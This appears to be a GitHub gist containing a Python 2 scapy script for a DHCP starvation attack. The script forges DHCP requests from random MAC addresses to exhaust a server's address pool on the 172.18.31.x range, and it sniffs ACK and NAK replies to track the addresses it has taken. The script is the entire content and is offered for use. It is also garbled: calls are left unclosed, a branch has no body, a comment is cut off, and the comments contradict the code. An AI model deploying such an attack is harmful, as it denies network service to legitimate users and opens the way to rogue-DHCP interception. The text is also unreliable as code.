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Last active July 26, 2017 13:42
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Dhcp Starvation
from scapy.all import *
from time import sleep
from threading import Thread
class DHCPStarvation(object):
def __init__(self):
# Generated MAC stored to avoid same MAC requesting for different IP
self.mac = [""]
# Requested IP stored to identify registered IP
self.ip = []
def handle_dhcp(self, pkt):
if pkt[DHCP]:
# if DHCP server reply ACK, the IP address requested is registered
# is IP for bt5, not to be starved
if pkt[DHCP].options[0][1]==5 and pkt[IP].dst != "":
print str(pkt[IP].dst)+" registered"
# Duplicate ACK may happen due to packet loss
elif pkt[DHCP].options[0][1]==6:
print "NAK received"
def listen(self):
# sniff DHCP packets
sniff(filter="udp and (port 67 or port 68)",
def start(self):
# start packet listening thread
thread = Thread(target=self.listen)
print "Starting DHCP starvation..."
# Keep starving until all 100 targets are registered
# 100~200 excepts 107 = 100
while len(self.ip) < 200: self.starve()
print "Targeted IP address starved"
def starve(self):
for i in xrange(255):
# don't request
if i == 90: continue
# generate IP we want to request
# if IP already registered, then skip
requested_addr = "172.18.31."+str(100+i)
if requested_addr in self.ip:
# generate MAC, avoid duplication
src_mac = ""
while src_mac in self.mac:
src_mac = RandMAC()
# generate DHCP request packet
pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="", dst="")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, "0123456789abcdef"))
pkt /= DHCP(options=[("message-type", "request"),
("requested_addr", requested_addr),
("server_id", ""),
print "Trying to occupy "+requested_addr
sleep(0.2) # interval to avoid congestion and packet l
if __name__ == "__main__":
starvation = DHCPStarvation()
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